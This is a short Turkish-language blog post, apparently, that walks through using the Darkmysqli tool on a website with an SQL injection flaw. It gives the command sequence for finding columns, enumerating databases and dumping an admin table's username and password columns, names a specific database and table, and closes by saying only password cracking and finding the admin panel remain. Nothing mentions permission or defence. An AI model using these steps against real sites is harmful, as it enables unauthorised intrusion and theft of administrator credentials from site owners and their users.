Merhaba Arkadaşlar.
Sizlere Darkmysqli kullanımını döküman olarak sunucam.
Elimizde Bir SQL Acıgı olan bir site var diyelim.
ilk önce konsolu(terminal) açıyoruz.
cd /pentest/web/darkmysqli yazıyoruz.
darkmysqli gelmiş oluyoruz böylelikle
İlk adım ;
python Darkmysqli -u "Site Url" --findcol aşagıdaki resimde örnek görüceksiniz,
http://f1204.hizliresim.com/w/4/4308n.png
tarama bittikten sonra size
SQL URL : ....
Darkmysqli URL : ..
.. yerlerde kodlar olucak aşagıdaki resimde görüceksiniz örnegini,
http://f1204.hizliresim.com/w/4/4308t.png
Darkmysqli -u "Site Url" Darkmysqli Url --full diyoruz, Aşşagıdaki Resime Bakabilirsiniz,
http://f1204.hizliresim.com/w/4/430c0.png
Tarama Şekilleri Görüceksiniz aşşagıdaki resimlerde ,
İki tane database oldugu için iki resim koydum hem örnek görün diye
http://f1204.hizliresim.com/w/4/4309z.png
http://f1204.hizliresim.com/w/4/430b7.png
bir tane databaseyi alalım islandsp_newsletter olsun bu tablo adı m_admin ve columsn username ve password
şimdi hepsinin bir harf atıyoruz.
Darkmysqli -u "Site Url" Darkmysqli Url --dump -D Database -T tablo -C columns örnekte görelim ;
http://f1204.hizliresim.com/w/4/430bk.png
yukarıda dediklerimden sonra eger şifre ve username şu şekilde görücek ;
http://f1204.hizliresim.com/w/4/430bp.png
ve şifre kırmak ve panel bulmak kaldı geriye..
Faydalı Olması Dilegiyle..
Hiç yorum yok:
Yorum Gönder